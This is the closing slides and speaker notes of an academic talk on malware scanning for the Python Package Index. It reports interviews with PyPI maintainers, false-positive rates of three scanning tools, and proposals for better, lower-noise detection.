  • 17. Potential directions for better scanning • Prioritize higher-impact packages: typosquatters, shrinkwrapped clones, and popular packages. • Consider dynamic scanning techniques, running code in a sandbox • Make sure tools are easy to interpret. “6 alerts” is hard to evaluate; “makes network calls to these domains,” less so. • Most importantly, don’t expect volunteer repository administrators to maintain and run tools for you; instead, form a relationship and plan to work together in the long haul. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 20
  • 18. Conclusions • The primary lesson from our interviews and experiments is to listen to maintainers. • Researchers should engage with maintainers, who can outline requirements for practical systems, and who have endless ideas worth exploring • We remain optimistic about open-source software security. Organizations like the OpenSSF do listen to maintainers while providing resources for academics, maintainers, and companies to collaborate. • As long as we listen to what the community has to say, open-source security will steadily improve. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 21

Editor's Notes

  1. Hello everyone, my name is Ly Vu. Today I am going to talk about our work titled Bad Snakes: Understanding and Improving Python Package Index Malware Scanning. This is the joint work with Zack Newman and John Speed Meyers. The work has been supported by ChainGuard. 
  2. Let me first explain what motivates our study. There are tools out there that can detect malicious open-source software packages. Plus, decades of academic research and commercial tools developed to detect malicious software. But are these tools really the cure to these malicious packages? Would they be able to be adopted in package repositories?
  3. To find out the requirements of package repositories for a malware detection tool and current status of malware detection tools. We conducted a study, that is two fold: first we checked in with administrators of PyPI, the main and biggest repository for third-party Python packages. We  then performed some experiments to compare different malware detection techniques to see how they measured up to the requirements of real package repositories.
  4. We distill several key insights from our study: Current malware detection tools does not seem to be suitable to run on open source package repositories automatically, because in large part they're too noisy in terms of false alerts. External researchers such as those coming from academia can and do run their own tools in their own environments and send incident reports to repository maintainers to get malware removed Both external researchers and PyPI benefit by working together There are promising directions from improving the malware scanners, and other, even more promising techniques from improving software repository security that administrators and other researchers are working toward right now.
  5. We interviewed PyPI administrators and a academic researcher to see what it would take to deploy malware detection techniques on open-source package repositories such as PyPI. PyPI or Python Package Index had implemented a so-called "malware checks" in 2020, two of our interviewees have direct experience in developing this system. However, unfortunately these checks aren't used anymore. We sought to find out why not, and what it would take to deploy such a system again. Particularly, we ask the following questions: What is the origin story of the current PyPI malware checks? What has been your experience, if any, with the current PyPI malware checks? What are the current plans, if any, for improving the PyPI malware checks? How do you judge the performance of a PyPI malware check system? How would you judge a set of proposed improvements to the PyPI malware check system?
  6. Many researchers when designing a detection system they aim to catch all or most malware. They tend to accept a low false-positive rate as the price to pay to catch bad actors. However, PyPI receives many legitimate packages everyday, even seemingly-low false positive rates would require administers to manually inspect thousands of packages each week.  Hence, an automated tool needs to have an "effectively zero" false positive rate to be considered to be integrated in a security pipeline of a package repository
  7. Second insight from our interviews, PyPI and similar package repositories  must weigh automated malware detection against other security mechanisms such as software signing and multi-factor authenticated.  On the other hand, most malware packages affected few or no actual users, for example downloads from mirrors or bots. PyPI administors therefore have decided to use their limited resources to focus on higher impact projects.
  8. External researchers such as those coming from academia develop and operate Python malware detection tools using their own time and computing resources, they then can report malicious packages to PyPI.  PyPI maintainers, therefore, benefit with high quality, low-noise reports on malware. On the other side, security researches benefit from positive coverage of their company, products, and services.
  9. To understand if a specific system was appropriate for the setting of security pipeline, we ran some experiments comparing different Python malware detection approaches. These systems include static code analysis, dynamic analysis tools that observe runtime behavior of a package, and metadata analysis tools that look at things like package names, or package downloads. We collected malware samples from the two biggest datasets named Backstabber’s Knife Collection and MALOSS. Also, we collected top popular and random packages from PyPI.
  10. This table represents the tools we surveyed. We focused on tools relying on behavior-based as it can provide much more precise analysis than metadata-based tools. A tool to be included should have their source code available and publish their detection rules.  At the end, we found three detection tools Bandit4Mal, a custom version of Bandit designed to catch malicious code. OSSGadget a tool developed by Microsoft to scan not only Python code but also other languages such as JavaScript. And, also PyPI Malware checks, the default check developed by PyPI.
  11. This diagram represents our experiments with the malware detection tools. Given the list of packages collected from PyPI and the two malware datasets. , we run the selected tools on the chosen package artifacts. We record the alerts generated on whole package and the setup.py file of a package as it is often the file injected by malicious code. An alert is considered as true positive if a malicious package is classified as malicious. Otherwise, it’s false positive when a beinign legitimate package is classified as malicious package.
  12. Here is what we found. We found that the scanners catch the majority of malicious packages, which is a good news. In particular, all three of the selected tools had true positive rates above 50% when considering only setup.py files When including all Python files, the tools detected over 85% of malicious packages.
  13. However, we observed that the tools suffered a relative high false positives especially, when checking all Python files. The false positive rates range between 15% and 97% for all tools. But when scanning all files, the chance of false classifying benign code as malicious was much higher. This suggest that these selected tools are designed to catch behavior that is suspicious in setup.py files, but normal in package code.
  14. We observed that packages with one alert often have many more. When it rains, it pours Scanning the setup.py files, installation files in Python packages, we find that all tools have a median of 3 or fewer alerts.  Scanning all Python files made the number of alerts increases to between 10 and 85 In our experiment, the noisiest benign package had 145,799 alerts.
  15. Rule-based tools require setting a proper threshold to balance false positive and true positive rate. In our experiment, rather than flagging a package as possibly malicious if it has any alerts, we tried requiring a threshold number of alerts. We found that with a higher threshold, the tools report very few (or even no) malicious packages even before the true positive rates become manageable
  16. We examined the rules in PyPI malware checks. We observed rules that not all rules are equal in detecting malicious code. Some rules are better than others. For example, checking the presence of an outgoing network connection or command execution could be a good indicator of a malicious package. Other rules, which looked for metaprogramming or running external processes were less effective in separating malicious and benign code. Improving the rules is therefore important in increasing the precision of the tools
  17. We observed the tools run reasonably fast. Particularly tested on a laptop having 8GB RAM, Intel CPU 4 cores processing a typical package took wel under 10 seconds This may be too slow to run before a package upload finishes but is quite reasonable to passively analyze a repository. For examples, you could ran the tools to scan entire repository.
  18. There are potenial directions for better scanning malware that we learned from the interviewers and our experiments First, Priortizing higher-impact packages such as typosquatting packages, and popular packages. These are common malware attacks, and highly used for malware infection Second, investing on dynamic scanning techniques, which run code in a sandbox, as it can provide more precise analysis and reflect true behavior of malware Third, making sure that the output of scanners are easy to interpret, for example giving insightful description for an alert. 6 alerts is hard to evaluate but making network calls to these domains or And last but not least, don’t expect volunteer repository administrators to maintain and run tools for you instead form a relationship and plan to work together in the long haul.
  19. It now comes to the end of my presentation. Let me summarize our research work in this final slide. The main message from our interviews and experiments is to listen to maintainers who are responsible for managing security issues in package repository External researchers can outline requirements for practical systems, and propose endless ideas for improving the system. They should actively engage with maintainers of package repositories to evaluate and get their feedback for their solutions. Still we remain optimistic about open-source software security. Organizations like OpenSSF do listen to maintainers while providing resources for academics, maintainers, and companies to collaborate. As long as we listen to what the community has to say, we believe open-source security will be improving steadily.